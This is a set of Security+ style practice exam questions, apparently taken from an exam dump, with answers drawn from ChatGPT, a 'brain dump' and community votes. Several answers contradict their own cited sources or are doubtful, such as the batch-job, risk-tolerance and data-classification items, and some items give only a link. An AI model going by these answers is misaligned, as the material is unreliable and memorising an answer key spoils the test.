A captive portal is a web page that intercepts and redirects a user’s attempt to access the network. It requires the user to complete certain actions before granting access, such as agreeing to terms of service or providing authentication credentials. Here’s how it fits the scenario described:

Capturing visitor information: A captive portal can be configured to collect specific information from visitors, such as their MAC addresses and names, before granting access to the school's Wi-Fi network. This information can help in associating potential malicious activity with specific individuals if needed for investigation purposes.

Compliance with policies: By requiring visitors to go through the captive portal, the college ensures that each visitor is identifiable, which aligns with the CTO's objective of associating network activity with specific persons.

Now, let’s briefly consider why the other options may not be as suitable:

A. Requiring all new on-site visitors to configure their devices to use WPS: While WPS (Wi-Fi Protected Setup) is a convenient method for device configuration, it does not inherently provide identification of individual users or capture their information for tracking purposes.

B. Implementing a new SSID for every event hosted by the college that has visitors: Creating new SSIDs for each event can be cumbersome to manage and does not directly solve the problem of identifying and associating malicious activity with specific users.

C. Creating a unique PSK for every visitor when they arrive at the reception area: While this approach can provide individualized access credentials, it does not inherently capture visitor information needed for tracking and associating network activity.

Therefore, deploying a captive portal to capture visitors’ MAC addresses and names is the best option to meet the CTO’s objective of allowing visitors to use the school’s Wi-Fi while being able to associate potential malicious activity with specific individuals.

720
Q

Which of the following is most likely associated with introducing vulnerabilities on a corporate network by the deployment of unapproved software?

A. Hacktivists
B. Script kiddies
C. Competitors
D. Shadow IT

A

D. Shadow IT

Explanation:

Shadow IT refers to the use of IT systems, software, and services within an organization without explicit approval or oversight from the IT department or management. When employees or departments deploy unapproved software or services, it can introduce several vulnerabilities and risks to the corporate network, including:

Security Vulnerabilities: Unapproved software may not undergo rigorous security testing or updates, leading to vulnerabilities that can be exploited by attackers.

Data Loss: Some shadow IT solutions may not have adequate data protection measures, leading to potential data breaches or leaks.

Compliance Risks: Using unapproved software may violate organizational policies, industry regulations, or legal requirements, exposing the organization to compliance risks.

Interoperability Issues: Shadow IT solutions may not integrate well with existing corporate systems, leading to operational disruptions or compatibility issues.

In contrast, the other options are less directly associated with introducing vulnerabilities through unapproved software deployment:

A. Hacktivists: Typically focus on political or social causes rather than deploying unapproved software within a corporate network.

B. Script Kiddies: Inexperienced individuals who use existing scripts or tools to exploit vulnerabilities but are not directly associated with introducing software to the network.

C. Competitors: While competitors may engage in corporate espionage or targeted attacks, they are less likely to introduce vulnerabilities by deploying unapproved software directly.

Therefore, shadow IT is the most likely option associated with introducing vulnerabilities on a corporate network due to the unauthorized deployment of software or services.

721
Q

A cybersecurity incident response team at a large company receives notification that malware is present on several corporate desktops. No known indicators of compromise have been found on the network. Which of the following should the team do first to secure the environment?

A. Contain the impacted hosts.
B. Add the malware to the application blocklist.
C. Segment the core database server.
D. Implement firewall rules to block outbound beaconing.

A

The first step the cybersecurity incident response team should take is A. Contain the impacted hosts.

Here’s why:

Containment is crucial to prevent further spread of the malware within the corporate network. By isolating or quarantining the impacted desktops, the team can limit the malware's ability to communicate or spread to other systems.

Adding the malware to the application blocklist (option B) might be a subsequent step but not the immediate priority. Before blocking the malware, the team needs to ensure they understand its behavior and impact fully.

Segmenting the core database server (option C) and implementing firewall rules to block outbound beaconing (option D) are important measures for preventing future incidents and minimizing damage but are not as urgent as containing the current infection.

Therefore, A. Contain the impacted hosts is the most immediate action the team should take to secure the environment and prevent further harm.

722
Q

An administrator receives the following network requirements for a data integration with a third-party vendor:

Port 443 allowed OUTGOING to www.vendorsite.com
Port 21 allowed OUTGOING to fs1.vendorsite.com
Port 22 allowed OUTGOING to fs2.vendorsite.com
Port 8080 allowed OUTGOING to www2.vendorsite.com

Which of the following is the most appropriate response for the administrator to send?

A. FTP is an insecure protocol and should not be used.
B. Port 8080 is a non-standard port and should be blocked.
C. SSH protocol version 1 is obsolete and should not be used.
D. Certificate stapling on port 443 is a security risk that should be mitigated.

A

A. FTP is an insecure protocol and should not be used.
Explanation:

A. FTP is an insecure protocol and should not be used:
    FTP (Port 21) is considered insecure because it transmits data, including credentials, in plain text. It is recommended to use a more secure protocol like FTPS (FTP Secure) or SFTP (SSH File Transfer Protocol) instead.

B. Port 8080 is a non-standard port and should be blocked:
    While Port 8080 is indeed a non-standard port for HTTP traffic, it is often used for web services and applications. Blocking it without understanding its specific use case may not be appropriate.

C. SSH protocol version 1 is obsolete and should not be used:
    While this is true, the requirement only mentions using Port 22 for SSH, not specifying SSH version 1. Most modern systems use SSH version 2, so this response may not address the immediate security concern.

D. Certificate stapling on port 443 is a security risk that should be mitigated:
    Certificate stapling is actually a security improvement for TLS/SSL connections as it reduces the need for clients to contact the Certificate Authority (CA) directly, enhancing performance and security. This is not a relevant or accurate concern in the context of the provided requirements.

Conclusion:

Given the context of the network requirements, the primary concern should be the use of FTP, which is inherently insecure. Therefore, the administrator should recommend against using FTP and suggest a more secure alternative.

723
Q

A security administrator manages five on-site APs. Each AP uses different channels on a 5GHz network. The administrator notices that another access point with the same corporate SSID on an overlapping channel was created. Which of the following attacks most likely occurred?

A. Jamming
B. NFC attacks
C. Disassociation
D. Bluesnarfing
E. Evil twin

A

E. Evil twin.

Here’s why:

An evil twin attack involves an attacker setting up a rogue wireless access point with the same SSID as a legitimate network. In this case, the attacker has created an access point with the same corporate SSID on an overlapping channel.

This attack aims to trick users and devices into connecting to the rogue AP instead of the legitimate one. Once connected, the attacker can intercept traffic, perform man-in-the-middle attacks, and potentially gain unauthorized access to sensitive information.

Jamming (option A) involves disrupting wireless communication by emitting radio frequency signals to interfere with legitimate signals, but it does not create a rogue AP.

NFC attacks (option B), disassociation (option C), and bluesnarfing (option D) are unrelated to the creation of a rogue AP with the same SSID.

Therefore, based on the scenario described, E. Evil twin is the most likely attack that occurred.

724
Q

A security team has been alerted to a flood of incoming emails that have various subject lines and are addressed to multiple email inboxes. Each email contains a URL shortener link that is redirecting to a dead domain. Which of the following is the best step for the security team to take?

A. Create a blocklist for all subject lines.
B. Send the dead domain to a DNS sinkhole.
C. Quarantine all emails received and notify all employees.
D. Block the URL shortener domain in the web proxy.

A

Community : B 55%, D 45%)
B. Send the dead domain to a DNS sinkhole.

Blocking the URL shortener domain in the web proxy (option D) could be an effective measure to prevent access to the malicious URLs. However, it’s important to consider the possibility that the attackers could use different URL shortener services or domains in the future. Therefore, while blocking the specific URL shortener domain may provide temporary relief, it might not address the root cause of the issue comprehensively.

On the other hand, sending the dead domain to a DNS sinkhole (option B) effectively prevents any traffic attempting to reach the malicious domain, regardless of the method used to access it. This approach is more proactive and robust, as it targets the destination domain itself rather than relying on blocking specific intermediaries. It provides a broader defense against potential future threats involving similar tactics

ChatGPT & Braindump :
D. Block the URL shortener domain in the web proxy.

Here’s the reasoning:

The emails contain URL shortener links that redirect to a dead domain. Despite the dead domain, the URL shortener itself could still potentially be used for malicious purposes in the future.

Blocking the URL shortener domain in the web proxy prevents users within the organization from accessing any malicious content that might be associated with the URL shortener links, even if the current links redirect to a dead domain.

Creating a blocklist for all subject lines (option A) might not be effective as attackers can easily change subject lines to evade detection.

Sending the dead domain to a DNS sinkhole (option B) is less effective in this case because the immediate threat lies with the URL shortener domain, not the dead domain it redirects to.

Quarantining all emails (option C) and notifying all employees could be considered, but blocking the URL shortener domain is a more direct and proactive step to prevent potential threats.

Therefore, D. Block the URL shortener domain in the web proxy is the best immediate action for the security team to take to mitigate the risk posed by these emails.

725
Q

https://exampracticetests.com/c/SY0-601/comptia-security-sy0-601-question725/

Simulation
a newly purchased corporate WAP needs to be conifgured in the MOST secure manner possible

INSTRUCTIONS

plase click on the below items on the network diagram and configure them accordingly

  • WAP
  • DHCP Server
  • AAA Server
  • Wireless Controller
  • LDAP Server

WAP connected to :
DHCP SERVER 192.168.60.10
AAA SERVER 192.168.1.20
WIRELESS CONTROLLER 172.28.1.30
LDAP SERVER 10.10.20.20

Wireless Access Point : Basic Wireless Settings
Wireless Network Mode : MIXED, B ONLY, G ONLY
Wireless Network Name (SSID) : DEFAULT
Wireless Channel: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11
Wireless SSID Broadcast : enable , disable

Wireless Access Point : Wireless Security
Security Mode: Disabled, WEP, WPA Enterprise, WPA Personal, WPA2 Enterprise, WPA2 Personal, RADIUS

DHCP Server
IP : 192.168.60.10
Netmask 255.255.255.0
DG : 192.168.60.1
Range : 10.50.7.0 - 10.50.8.255
DNS Server : 192.168.30.4, 192.168.40.4
Reserved : A1-27-CA-23-45-76-E3 10.50.7.5
Reserved : B3-47-A3-18-E7-7D-E2 10.50.7.6
Domain : corporatenet
Port : 67

AAA Server
IP : 192.168.1.20
Netmask 255.255.255.0
DG : 192.168.1.1
Secret : corporatenet
Realm : wirelessnet
Port : 1812

Wireless Controller
IP : 172.28.1.30
Netmask 255.255.255.0
DG : 172.28.1.1
Admin User : root
Admin Password : corporatenett
WPA Key : supersecret
Port : 1212

LDAP Server
IP : 10.10.20.20
Netmask 255.255.255.0
DG : 10.10.20.1
Domain : corporatenet
Tree Name : wirelessnet
Bind Password : secretpass
Port : 389

A

Select the following in wireless access point:
Wireless Network Mode: -MIXED
Wireless Channel -11
Security Mode: WPA2 Enterprise

726
Q

DRAG DROP
A security engineer is setting up passwordless authentication for the first time.

INSTRUCTIONS
Drag and drop the MINIMUM set of commands to set this up and verify that it works. Commands may only be used once, and not all will be used.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Select and Place:

Commands :
chmod 777 ~/.ssh/authorized_keys
openssl x509 -in ~/ssh/id_rsa.pub -text -noout
ssh root@server
scp ~/.ssh/id_rsa user@server:.ssh/authorized_keys
ssh-keygen -t rsa
ssh-copyid -i ~/.ssh/id_rsa.pub user@sever
ssh -i ~/.ssh/id_rsa user@server

SSH Client ?

A

ssh-keygen -t rsa
ssh-copyid -i ~/.ssh/id_rsa.pub user@sever
ssh -i ~/.ssh/id_rsa user@server

727
Q

A data administrator is configuring authentication for a SaaS application and would like to reduce the number of credentials employees need to maintain. The company prefers to use domain credentials to access new SaaS applications. Which of the following methods would allow this functionality?

A. SSO
B. LEAP
C. MFA
D. PEAP

A

A. SSO (Single Sign-On)

Here’s why:

Single Sign-On (SSO) allows users to authenticate once with their domain credentials (like Active Directory credentials) and then gain access to multiple applications without needing to re-enter their credentials for each application.

SSO integrates with existing identity management systems, such as Active Directory, to provide a seamless login experience across different applications.

LEAP (option B) and PEAP (option D) are authentication protocols typically used in wireless networks and are not related to SaaS application authentication.

MFA (Multi-Factor Authentication) (option C) enhances security by requiring multiple forms of verification for access, but it does not necessarily reduce the number of credentials employees need to maintain for different applications.

Therefore, A. SSO is the method that aligns with the goal of using domain credentials to access new SaaS applications while reducing the credential management overhead for employees.

728
Q

Which of the following would be best suited for constantly changing environments?

A. RTOS
B. Containers
C. Embedded systems
D. SCADA

A

B. Containers

Here’s why:

Containers are lightweight, portable, and scalable units of software that package up code and all its dependencies. They provide consistent environments across different infrastructure setups, making them ideal for rapidly changing environments where scalability and flexibility are crucial.

Containers can be quickly deployed, updated, and scaled horizontally, making them well-suited for dynamic environments that require frequent changes or updates.

RTOS (Real-Time Operating System) (option A) is designed for systems that require precise timing and predictable response times, typically in embedded systems and critical applications, but it is not specifically geared towards constantly changing environments.

Embedded systems (option C) are specialized systems designed to perform specific tasks within constrained environments, often with limited resources and fixed functionality. They are not inherently suited for constantly changing environments.

SCADA (Supervisory Control and Data Acquisition) (option D) systems are used for monitoring and controlling industrial processes, and while they can handle real-time data and updates, they are typically deployed in stable and controlled environments rather than constantly changing ones.

Therefore, B. Containers are the best choice among the options provided for environments that undergo frequent changes and updates.

729
Q

A newly identified network access vulnerability has been found in the OS of legacy IoT devices. Which of the following would best mitigate this vulnerability quickly?

A. Insurance
B. Patching
C. Segmentation
D. Replacement

A

C. Segmentation
Explanation:

A. Insurance:
    While insurance can help mitigate financial losses after an incident, it does not directly address the technical vulnerability itself.

B. Patching:
    Patching is generally the best long-term solution to fix vulnerabilities. However, for legacy IoT devices, patches may not be readily available, or applying them might require significant time and resources.

C. Segmentation:
    Segmentation involves isolating the vulnerable devices from the rest of the network. This can be done quickly and effectively to prevent potential exploitation of the vulnerability from spreading or affecting critical parts of the network.

D. Replacement:
    Replacing the legacy IoT devices is another effective solution but it is likely to be time-consuming and costly, making it less suitable for a quick mitigation.

Conclusion:

Segmentation is the quickest and most effective immediate measure to mitigate the vulnerability in legacy IoT devices. It can limit the potential damage by isolating these devices from the main network and other critical systems, thereby reducing the risk of exploitation.

730
Q

The local administrator account for a company’s VPN appliance was unexpectedly used to log in to the remote management interface. Which of the following would have prevented this from happening?

A. Using least privilege
B. Changing the default password
C. Assigning individual user IDs
D. Implementing multifactor authentication

A

B. Changing the default password

Here’s why:

Changing the default password is a fundamental security practice that helps prevent unauthorized access using default credentials. Many devices, including VPN appliances, come with default passwords that are well-known and easily exploited if not changed.

Using least privilege (option A) involves granting users only the permissions necessary to perform their tasks, but it does not directly prevent unauthorized access if default credentials are used.

Assigning individual user IDs (option C) helps in accountability and tracking user actions but does not prevent unauthorized access if default credentials are used.

Implementing multifactor authentication (option D) adds an additional layer of security by requiring multiple forms of verification, but it would not have prevented access if the default password was used without any additional authentication factors.

Therefore, B. Changing the default password is the measure that would have directly prevented the unexpected use of the local administrator account to log into the VPN appliance’s remote management interface.

731
Q

https://exampracticetests.com/c/SY0-601/comptia-security-sy0-601-question731/

HOTSPOT
You are a security administrator investigating a potential infection on a network.
INSTRUCTIONS
Click on each host and firewall. Review all logs to determine which host originated the infection and then identify if each remaining host is clean or infected.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:

R&D Network connects to firewall (Int A)
Engineering Network connects to firewall (Int B)
Internet connected to a firewall (Int C)

R&D Network (int A)
192.168.10.22 Origin, Infected, Clean
192.168.10.37 Origin, Infected, Clean
192.168.10.41 Origin, Infected, Clean

Engineering Network (int B)
10.10.9.12 Origin, Infected, Clean
10.10.9.18 Origin, Infected, Clean

A

R&D Network (int A)
192.168.10.22 Infected
192.168.10.37 Clean
192.168.10.41 Clean

Engineering Network (int B)
10.10.9.12 Clean
10.10.9.18 Infected

732
Q

Which of the following describes the exploitation of an interactive process to gain access to restricted areas?

A. Persistence
B. Port scanning
C. Privilege escalation
D. Pharming

A

C. Privilege escalation

Here’s why:

Privilege escalation refers to the exploitation of a vulnerability or flaw in an interactive process to gain higher privileges than originally authorized. This allows an attacker to access restricted areas or perform actions that are typically not allowed under normal circumstances.

Persistence (option A) refers to techniques used by attackers to maintain access to a system or network over an extended period, often through malware or backdoors.

Port scanning (option B) is the process of scanning a computer or network to find open ports and assess the security posture.

Pharming (option D) is a cyber attack where an attacker redirects a website's traffic to a fake website to steal information.

Therefore, the exploitation of an interactive process to gain access to restricted areas is best described by C. Privilege escalation.

733
Q

https://exampracticetests.com/c/SY0-601/comptia-security-sy0-601-question733/

SIMULATION

A company recently added a DR site and is redesigning the network. Users at the DR site are having issues browsing websites.

INSTRUCTIONS
Click on each firewall to do the following :
1. Deny cleartext web traffic
Ensure secure management protocols are used
3. Resolve issues at the DR site

The ruleset order cannot be modified due to outside constraints.

A

https://exampracticetests.com/c/SY0-601/comptia-security-sy0-601-question733/

734
Q

DRAG DROP
A data owner has been tasked with assigning proper data classifications and destruction methods for various types of data contained within the environment.

INSTRUCTIONS
From the options below, drag each item to its appropriate classification as well as the MOST appropriate form of disposal.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Select and Place:

Drag & Drop

  1. Bound copies of internal audit reports from a private company
  2. Copies of financial audit reports from exchange-traded organizations on a flash drive
  3. Database containing driver’s license information on a reusable backup tape
  4. Decommissioned mechanical hard drive containing application source code.
  5. Employee records on an SSD.
  6. Paper-based customer records, which include medical data

Drop into the following :
Data Classification :
PII
PHI
Intellectual Property
Corporate Confidential
Public

Data Destruction Method :
Degaussing and Multi-Pass Wipe
Physical Destruction via Shredding

A

Community :
PII&raquo_space; 3
PHI&raquo_space; 6
IP&raquo_space; 4
CC&raquo_space; 1,5
Public> 2
—————–
Degaussing&raquo_space; 3,4
Shredding&raquo_space; 1,2,5,6

(Brain dump)
Data Classification :
PII - 5. Employee records on an SSD.
PHI - 6. Paper-based customer records, which include medical data
Intellectual Property - 2. Copies of financial audit reports from exchange-traded organizations on a flash drive
Corporate Confidential - 2. Copies of financial audit reports from exchange-traded organizations on a flash drive
Public - 1. Bound copies of internal audit reports from a private company

Data Destruction Method :
Degaussing and Multi-Pass Wipe - 3. Database containing driver’s license information on a reusable backup tape
Physical Destruction via Shredding - 4. Decommissioned mechanical hard drive containing application source code.

735
Q

A security analyst is assessing several company firewalls. Which of the following tools would the analyst most likely use to generate custom packets to use during the assessment?

A. hping
B. Wireshark
C. PowerShell
D. netstat

A

A. hping

Here’s why:

hping is a command-line tool that allows users to generate custom ICMP, UDP, and TCP packets. It is particularly useful for crafting packets with specific characteristics or payloads to test firewall rules and responses.

Wireshark (option B) is a network protocol analyzer that captures and displays packets but does not generate custom packets.

PowerShell (option C) is a scripting language and command-line shell used for task automation and configuration management in Windows environments, but it is not primarily used for generating custom packets.

netstat (option D) is a command-line tool used to display network connections, routing tables, interface statistics, etc., but it does not generate packets.

Therefore, A. hping is the tool that the security analyst would most likely use to generate custom packets for assessing company firewalls.

736
Q

A local business was the source of multiple instances of credit card theft. Investigators found that most payments at this business were made at self-service kiosks. Which of the following is the most likely cause of the exposed credit card Information?

A. Insider threat
B. RAT
C. Backdoor
D. Skimming
E. NFC attack

A

D. Skimming

Here’s why:

Skimming involves the unauthorized capture of credit card information by attaching a device to a legitimate payment terminal or ATM. In the case of self-service kiosks, criminals can install skimming devices or overlays on card readers to capture card details as customers swipe or insert their cards.

Skimming devices are designed to be discreet and capture card data, including the card number, expiration date, and sometimes the cardholder's name. This information can then be used for fraudulent transactions or sold on the dark web.

Insider threat (option A) refers to malicious or negligent actions by individuals within an organization who misuse their access to cause harm, but skimming typically involves external criminals exploiting vulnerabilities in payment systems.

RAT (Remote Access Trojan) (option B) and backdoor (option C) are types of malicious software or techniques that can allow unauthorized access to systems but are not typically associated with credit card theft at self-service kiosks.

NFC attack (option E) involves exploiting vulnerabilities in Near Field Communication technology to gain unauthorized access or steal information, but it's less likely in this context compared to physical skimming devices on kiosks.

Therefore, D. Skimming is the most likely cause of the exposed credit card information at the self-service kiosks in the local business.

737
Q

An employee recently resigned from a company. The employee was responsible for managing and supporting weekly batch jobs over the past five years. A few weeks after the employee resigned, one of the batch jobs failed and caused a major disruption. Which of the following would work best to prevent this type of incident from reoccurring?

A. Job rotation
B. Retention
C. Outsourcing
D. Separation of duties

A

(Brain dump: A. Job rotation)
(Community : A 71%, D 29%)

D. Separation of duties

Here’s why:

Separation of duties involves dividing responsibilities among multiple employees so that no single person has complete control over a critical process or function. In this case, if responsibilities for managing and supporting batch jobs had been divided among multiple employees or roles, the resignation of one person would not have led to such a significant disruption.

Job rotation (option A) involves moving employees through different roles or responsibilities to provide them with experience and prevent burnout, but it does not directly address the issue of dependency on a single person for critical tasks.

Retention (option B) focuses on keeping employees within the organization but does not necessarily prevent disruptions caused by the departure of a key individual.

Outsourcing (option C) involves contracting tasks or services to external parties, which may not always be feasible or effective for managing internal processes like batch jobs.

Therefore, D. Separation of duties is the most effective measure to prevent incidents caused by the sudden departure of an employee who had critical responsibilities, such as managing and supporting batch jobs.

738
Q

Following a recent security breach, an analyst discovered that user permissions were added when joining another part of the organization but were not removed from existing groups. Which of the following policies would help to correct these issues in the future?

A. Service accounts
B. Account audits
C. Password complexity
D. Lockout policy

A

B. Account audits

Here’s why:

Account audits involve regular reviews of user accounts, permissions, and access rights. By conducting periodic audits, organizations can identify and remove unnecessary permissions that users may have accumulated over time, such as permissions from previous roles or departments.

In the scenario described, if account audits had been performed regularly, the organization would have detected that permissions were not being properly managed when users moved between different parts of the organization. This would allow for timely removal of unnecessary permissions and help prevent security breaches caused by excessive access.

Service accounts (option A) are accounts used by services or applications rather than individual users and are managed differently from user accounts.

Password complexity (option C) and lockout policy (option D) are measures related to password security and account access control but do not directly address the issue of improper permission management when users change roles or departments.

Therefore, B. Account audits is the policy that would help correct the issue of permissions not being removed from existing groups after users join another part of the organization.

739
Q

Which of the following ensures an organization can continue to do business with minimal interruption in the event of a major disaster?

A. Business recovery plan
B. Incident response plan
C. Communication plan
D. Continuity of operations plan

A

D. Continuity of operations plan

Here’s why:

Continuity of operations plan (COOP) is designed to ensure that essential functions of an organization can continue to operate or be quickly restored in the event of a major disruption, such as a natural disaster, cyber attack, or other emergencies.

A COOP typically includes strategies, policies, and procedures to maintain essential services, manage resources, and mitigate risks during and after a disaster, thereby minimizing disruption to business operations.

Business recovery plan (option A) focuses on recovering and restoring business operations after a disruption has occurred, rather than ensuring continuous operation during the disaster itself.

Incident response plan (option B) outlines actions to be taken immediately when an incident occurs to contain, mitigate, and recover from the incident, but it does not necessarily ensure continuous business operations.

Communication plan (option C) outlines how communication will be managed during an incident or disaster, which is important but not sufficient alone to ensure continuity of operations.

Therefore, D. Continuity of operations plan is the option that best ensures an organization can continue to do business with minimal interruption in the event of a major disaster.

740
Q

In a rush to meet an end-of-year business goal, the IT department was told to implement a new business application. The security engineer reviews the attributes of the application and decides the time needed to perform due diligence is insufficient from a cybersecurity perspective. Which of the following BEST describes the security engineer’s response?

A. Risk tolerance
B. Risk acceptance
C. Risk importance
D. Risk appetite

A

(Community : B 66%, A 24%)

Choose A, Risk Tolerance.

The security engineer’s response indicates a decision not to proceed due to cybersecurity concerns despite pressure to meet a business goal. This aligns closely with the concept of “Risk tolerance,” which refers to an organization’s willingness to accept the level of risk associated with a particular activity or decision.

So, the BEST description of the security engineer’s response is:

A. Risk tolerance

741
Q

A security team created a document that details the order in which critical systems should be brought back online after a major outage. Which of the following documents did the team create?

A. Communication plan
B. Incident response plan
C. Data retention policy
D. Disaster recovery plan

A

D. Disaster recovery plan

Here’s why:

A disaster recovery plan (DRP) is a structured approach outlining the steps and procedures to recover and restore critical systems and operations after a major disruption or disaster. It includes specific details such as the sequence in which systems should be restored, the roles and responsibilities of team members, communication protocols, and recovery time objectives (RTOs).

The order in which critical systems should be brought back online is a key component of a disaster recovery plan, ensuring that the organization can resume essential operations in a structured and efficient manner.

Communication plan (option A) focuses on how communication will be managed during and after an incident or disaster.

Incident response plan (option B) outlines actions to be taken immediately when an incident occurs to contain, mitigate, and recover from the incident.

Data retention policy (option C) defines how long data should be retained and the procedures for managing data throughout its lifecycle, which is unrelated to the sequence of system restoration.

Therefore, D. Disaster recovery plan is the document that the security team created to specify the order for bringing critical systems back online after a major outage.

742
Q

A company wants to reconfigure an existing wireless infrastructure. The company needs to ensure the projected WAP placement will provide proper signal strength to all workstations. Which of the following should the company use to best fulfill the requirements?

A. Network diagram
B. WPS
C. 802.1X
D. Heat map

A

D. Heat map

Here’s why:

A heat map is a graphical representation that shows the signal strength and coverage areas of wireless access points (WAPs) within a given space. It helps visualize where the signal is strong, weak, or non-existent, allowing for optimal placement of WAPs to ensure adequate coverage for all workstations.

By using a heat map, the company can plan and adjust the placement of WAPs to minimize dead zones and ensure that all areas where workstations are located receive sufficient Wi-Fi signal strength.

Network diagram (option A) provides a schematic representation of the network topology and devices but does not specifically show signal strength or coverage areas of WAPs.

WPS (Wi-Fi Protected Setup) (option B) is a method to simplify the process of connecting devices to a wireless network but does not provide information on signal strength.

802.1X (option C) is an IEEE standard for network access control, specifically for port-based authentication, and is unrelated to determining Wi-Fi signal coverage.

Therefore, D. Heat map is the tool that the company should use to best ensure proper signal strength to all workstations when reconfiguring their wireless infrastructure.

743
Q

A company wants to pragmatically grant access to users who have the same job. Which of the following access controls should the company most likely use?

A. Role-based
B. Need-to-know
C. Mandatory
D. Discretionary

A

A. Role-based

Here’s why:

Role-based access control (RBAC) is a widely used access control model where access decisions are based on the roles assigned to users within an organization. Users are grouped into roles based on their job functions, responsibilities, and authorization needs.

RBAC simplifies access management by granting permissions to roles rather than to individual users. This approach ensures that users who share the same job responsibilities receive consistent access permissions, reducing administrative overhead and enhancing security.

Need-to-know (option B) is a principle that restricts access to sensitive information to only those users who need it to perform their job duties. It is often used in environments where access must be strictly controlled based on specific information requirements rather than job roles.

Mandatory access control (option C) is a stricter access control model where access decisions are based on security labels assigned to subjects and objects. It is typically used in environments with high security requirements, such as military or government settings.

Discretionary access control (option D) allows users to determine who can access their resources and is based on the discretion of the resource owner. It provides flexibility but may not be as structured or pragmatic for managing access based on job roles.

Therefore, A. Role-based access control is the most appropriate choice for pragmatically granting access to users who have the same job within a company.

744
Q

A security engineer is working to address the growing risks that shadow IT services are introducing to the organization. The organization has taken a cloud-first approach and does not have an on-premises IT infrastructure. Which of the following would best secure the organization?

A. Upgrading to a next-generation firewall
B. Deploying an appropriate in-line CASB solution
C. Conducting user training on software policies
D. Configuring double key encryption in SaaS platforms

A

B. Deploying an appropriate in-line CASB (Cloud Access Security Broker) solution

Here’s why:

CASB solutions are specifically designed to provide visibility, control, and security for cloud services and applications. They can monitor and manage usage of cloud services, enforce security policies, and detect and mitigate risks associated with shadow IT, such as unauthorized cloud applications and services.

An in-line CASB solution integrates directly with cloud services and applications, allowing real-time visibility and control over data and activities. This helps prevent unauthorized access, ensures compliance with security policies, and protects sensitive data stored and processed in the cloud.

Upgrading to a next-generation firewall (option A) focuses on securing network traffic but may not provide sufficient visibility and control over cloud services and applications.

User training on software policies (option C) is important for educating employees on acceptable use policies and security practices, but it may not effectively prevent or mitigate risks introduced by shadow IT services.

Configuring double key encryption in SaaS platforms (option D) enhances data security but does not directly address the visibility, control, and management of shadow IT services.

Therefore, B. Deploying an appropriate in-line CASB solution is the best option to help secure the organization against the growing risks introduced by shadow IT services in a cloud-first environment.

745
Q

An enterprise has hired an outside security firm to conduct penetration testing on its network and applications. The firm has been given all the developer’s documentation about the internal architecture. Which of the following best represents the type of testing that will occur?

A. Bug bounty
B. White-box
C. Black-box
D. Gray-box

A

B. White-box

Here’s why:

White-box testing (option B) involves testing a system with full knowledge of its internal workings, architecture, and code. In this scenario, since the security firm has been provided with all the developer's documentation about the internal architecture, they will have comprehensive insight into how the network and applications are structured, how they interact, and potentially even access to source code.

White-box testing allows the security firm to perform thorough assessments, including code reviews, architectural reviews, and in-depth analysis of potential vulnerabilities based on the known internal structure of the system.

Black-box testing (option C) involves testing a system with no prior knowledge of its internal workings or architecture. The tester approaches the system as an outsider would, without access to internal documentation or source code.

Gray-box testing (option D) is a hybrid approach that combines elements of both white-box and black-box testing, where the tester has partial knowledge of the system, such as some internal documentation or limited access to code.

Bug bounty (option A) refers to a program where external researchers or hackers are invited to find and report vulnerabilities in a system, often without access to internal documentation but sometimes with access to the application itself.

Therefore, B. White-box best represents the type of testing that will occur when the security firm has been provided with all the developer’s documentation about the internal architecture of the enterprise’s network and applications.

746
Q

Which of the following are the most likely vectors for the unauthorized or unintentional inclusion of vulnerable code in a software company’s final software releases? (Choose two).

A. Certificate mismatch
B. Use of penetration-testing utilities
C. Weak passwords
D. Included third-party libraries
E. Vendors/supply chain
F. Outdated anti-malware software

A

D. Included third-party libraries

E. Vendors/supply chain
Explanation:

D. Included third-party libraries:
    Third-party libraries are often used to save development time and add functionality. However, they can also introduce vulnerabilities if not properly vetted or if they contain security flaws. These libraries might be included in the final software release without a thorough security review.

E. Vendors/supply chain:
    Vulnerabilities can be introduced through the supply chain, such as through compromised software components or development tools provided by third-party vendors. This vector highlights the risks associated with dependencies on external suppliers and the potential for supply chain attacks.

Less likely vectors:

A. Certificate mismatch:
    While certificate mismatches can lead to security issues, they are not a common vector for including vulnerable code in software releases. They are more related to secure communications and authentication issues.

B. Use of penetration-testing utilities:
    Penetration-testing utilities are typically used to identify vulnerabilities, not introduce them. While misuse of these tools could potentially cause issues, they are not a primary vector for vulnerable code inclusion.

C. Weak passwords:
    Weak passwords are a security concern but are more related to unauthorized access rather than the inclusion of vulnerable code in software releases.

F. Outdated anti-malware software:
    While outdated anti-malware software can lead to inadequate protection against malware, it does not directly lead to the inclusion of vulnerable code in software releases.

Conclusion:

The use of third-party libraries and supply chain dependencies are the most likely vectors for the unauthorized or unintentional inclusion of vulnerable code in a software company’s final software releases.

747
Q

A hosting provider needs to prove that its security controls have been in place over the last six months and have sufficiently protected customer data. Which of the following would provide the best proof that the hosting provider has met the requirements?

A. NIST CSF
B. SOC 2 Type 2 report
C. CIS Top 20 compliance reports
D. Vulnerability report

A

B. SOC 2 Type 2 report

Here’s why:

SOC 2 Type 2 report is specifically designed to provide assurance about the effectiveness of controls relevant to security, availability, processing integrity, confidentiality, and privacy. It evaluates the service provider's systems and the suitability of the design and operating effectiveness of these controls over a period of time, typically six months or more.

The report is conducted by an independent third-party auditor who assesses and tests the controls based on the Trust Services Criteria (TSC) established by the American Institute of CPAs (AICPA).

SOC 2 Type 2 reports are highly regarded in the industry and provide detailed findings and assurances that the hosting provider's security controls have been implemented and operated effectively to protect customer data.

NIST CSF (option A) provides a framework for organizations to manage and improve their cybersecurity posture but does not provide the same level of independent verification and assurance as a SOC 2 Type 2 report.

CIS Top 20 compliance reports (option C) are based on recommended security controls to mitigate common cyber threats but do not provide comprehensive assessment and assurance of security controls over a specific period like a SOC 2 Type 2 report.

Vulnerability report (option D) may provide insights into specific vulnerabilities identified within the environment but does not offer comprehensive assurance about the overall effectiveness of security controls and protection of customer data over time.

Therefore, B. SOC 2 Type 2 report would provide the best proof that the hosting provider has maintained security controls and sufficiently protected customer data over the last six months.

748
Q

Which of the following are common VoIP-associated vulnerabilities? (Choose two).

A. SPIM
B. Vishing
C. VLAN hopping
D. Phishing
E. DHCP snooping
F. Tailgating

A

(Brain dump: A. SPIM, B. Vishing )
(Community AB 55%, BC 34%)
